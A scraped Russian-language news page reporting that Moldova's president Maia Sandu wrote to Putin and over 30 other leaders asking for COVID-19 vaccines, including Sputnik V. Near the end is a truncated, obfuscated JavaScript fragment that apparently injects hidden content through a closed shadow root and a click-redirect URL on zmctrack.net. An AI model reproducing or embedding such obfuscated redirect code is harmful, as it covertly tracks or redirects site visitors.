В мире

Попросила вакцину для Молдовы: Санду написала письмо Путину

Подобное письмо она отправила еще в 30 стран

Президент Молдовы Мая Санду написала письмо президенту России Владимиру Путину с просьбой помочь получить Молдове вакцину от коронавируса “Спутник V”. Однако похожие письма отправлены не только Путину.

Об этом она сказала в эфире канала RTR Moldova, пишет NewsMaker.

"Я разговаривала с господином послом (России, – Ред.) и он сказал, что сейчас вряд ли получится купить вакцину, но ее могут передать как помощь. Сегодня я написала письмо президенту России", — заявила Санду.

Она отметила, что кроме России, помочь с вакцинами попросила лидеров еще более чем 30 стран.

В тренде
Вакцины против штамма COVID-19 из ЮАР оказались на 30% менее эффективными

Как известно, в Молдове зарегистрировали три вакцины от коронавируса: Pfizer/BioNTech, AstraZeneca и "Спутник V". Минздрав Молдовы не исключает, что закупит российский препарат для бесплатной вакцинации, если его одобрит ВОЗ.

Напомним, 2 марта в Молдове стартовала вакцинация от коронавируса
. Для этого используют препарат компании AstraZeneca.

Все подробности в спецтеме Вакцинация от коронавируса

Подпишись на наш telegram

Только самое важное и интересное

Подписаться

Молдова
вакцина
коронавирус
Владимир Путин
Майя Санду
Спутник V

Читайте Segodnya.ua в Google News

Следите за нами в соцсетях

Подписывайтесь на нашу рассылку

Введите корректный email

Ок

Новости партнеров

Загрузка…

Популярные статьи

 Попросила вакцину для Молдовы: Санду написала письмо ПутинуКоронавирус боится гриппа: открыта неожиданная уязвимость COVID-19Другие страны  Попросила вакцину для Молдовы: Санду написала письмо ПутинуВ Грузии медсестра впала в кому после вакцинации AstraZenecaДругие страны  Попросила вакцину для Молдовы: Санду написала письмо ПутинуAstraZeneca создала COVID-вакцину в форме спрея для носаДругие страны  Попросила вакцину для Молдовы: Санду написала письмо ПутинуУкраина рискует снова остаться без вакцин. Индия приостанавливает экспорт CoviShieldДругие страны  Попросила вакцину для Молдовы: Санду написала письмо ПутинуУкраина получила вакцину CoronaVac: 10 главных фактов о китайской вакцинеУкраина  Попросила вакцину для Молдовы: Санду написала письмо ПутинуУкраина может лишиться вакцины CoviShield: у Индии появились претензииУкраина

Новости партнеров

Загрузка…

загрузка…

 Попросила вакцину для Молдовы: Санду написала письмо Путину

Наши соцсети

  • Facebook

  • Telegram

  • Youtube

  • Instagram

Связаться с нами

  • Контакты редакции

  • Написать нам

  • на сайте

  • Спецпроекты

  • Архив сайта

Политика сайта

  • Правила цитирования

  • Правила комментирования

  • Конфиденциальность и защита персональных данных

Стоковые фотографии от

© segodnya.ua, 2021

Лента новостей

Главное

Нажимая на кнопку «Принять» или продолжая пользоваться сайтом, вы соглашаетесь с

правилами использования

файлов cookie.

Принять

if(document.documentElement.clientWidth > 1199) {
(function(){(function(l,d,A){“use strict”;var t,o,e,i,z,r,n,S,T,a,c,f,s,p,h,u,b,D,k,v,g,x,m,E,y,M,C,O,L,N,w,_,H,I,R,q,P,$,j,F,J=300,W=”/z”,X=”0x04″,B=”http”,G=”substr”,K=”host”,Q=J,U=”argon_”+”debug”+”=1″,V=”prototype”,Y=”createElement”,Z=”appendChild”,tt=”setTimeout”,ot=”querySelectorAll”,et=”getOwnPropertyDescriptor”,rt=”Object”,nt=”charCodeAt”,it=”fromCharCode”,at=”zmctrack”+”.net”,ct=”bind”,ft=”call”,lt=”script”,dt=”head”,st=”get”,pt=”set”,ht=”indexOf”,ut=”s.”+at,bt=”cookie”,kt=”XMLHttpRequest”,vt=”Date”,gt=”now”,xt=”responseText”,mt=”open”,yt=”ShadowRoot”,wt=”Node”,At=”send”,zt=”Array”,St=”addEventListener”,Tt=B+”://”+”click”+”.”+at+”/c/”+”redirect”+”?”+”hash”+”=”,Dt=”slot”,Et=”Math”,Mt=”floor”,Ct=”random”,Ot=”console”,Lt=”Document”,Nt=”innerHTML”,_t=”attachShadow”,Ht=”offsetWidth”,It=”Element”,Rt=”next”,qt=”previous”,Pt=”push”,$t=”length”,jt=”shift”,Ft=”parentNode”,Jt=”textContent”,Wt=”JSON”,Xt=”parse”,Bt=”load”,Gt=”HTML”+It,Kt=”error”,Qt=”location”,Ut=”href”,Vt=”POST”,Yt=”document”,Zt=”un”+”eval”,to={},oo=”parseInt”,eo=It+”Sibling”,ro=”String”,no=”split”;to[“mode”]=”closed”,t=l[Yt],o=l[“chrome”],e=!0,i=0;try{e=!!l[Zt]}catch(t){}function io(t,o){return q[ft](t,o||”|”)}!o&&!e||(z=l[“n10091125”],r=z[Yt],n=z[rt][et],S=r[ot][ct](t),T=z[tt][ct](l),a=n(z[Lt][V],dt)[st][ft](t),c=r[Y][ct](t),f=r[dt][Z][ct](a),s=z[vt][gt],p=-1Q?i++

По материалам: Сегодня

Материалы по теме

Залишити відповідь

Ваша e-mail адреса не оприлюднюватиметься. Обов’язкові поля позначені *

Back to top button